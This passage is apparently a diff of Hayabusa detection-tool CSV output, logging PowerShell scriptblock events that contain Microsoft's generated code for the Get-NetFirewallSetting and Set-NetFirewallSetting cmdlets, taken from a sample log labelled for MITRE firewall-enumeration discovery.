(cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,letization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdleti,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 